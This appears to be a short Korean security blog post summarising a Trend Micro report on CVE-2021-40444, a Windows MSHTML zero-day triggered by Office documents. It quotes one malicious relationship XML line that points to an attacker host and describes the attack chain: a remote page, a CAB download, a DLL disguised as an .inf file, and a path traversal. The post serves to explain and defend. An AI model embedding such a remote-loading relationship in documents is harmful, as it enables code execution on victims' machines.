[하루한줄] Remote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs

URL

https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html

Target

  • Microsoft Office Word

Explain

최근 트위터가 이거 때문에 핫하죠. 역시 실제 공격에 사용된 취약점 입니다!

일단 워드 파일 안에 있는 relationship 파일을 보면 아래와 같은 수상한 URL이 존재합니다.

<Relationship Id="rId6" Type="<http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject>" Target="mhtml:<http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html>" TargetMode="External" />

Relationship 파일에는 보통 내/외부로부터 가져오는 리소스들을 담고 있다고 합니다. 해커는 위 링트에서 mhtml 파일을 가져오는데, mhtml 파일은 이미지, 플래시 애니메이션 등 모든 리소스가 한꺼번에 저장되어 있는 html 파일입니다.

이렇게되면 원격 서버에 있는 mhtml 프로토콜을 통해 side.html 파일이 IE에 로드되어 안에 있는 자바스크립트가 실행됩니다. 자바스크립트에서는 cab 파일을 다운 받고 실행합니다. cab 파일에서는 dll 파일을 championship.inf라는 이름으로 저장하고 path traversal을 통해 해당 파일을 로드하여 코드를 실행합니다.



본 글은 CC BY-SA 4.0 라이선스로 배포됩니다. 공유 또는 변경 시 반드시 출처를 남겨주시기 바랍니다.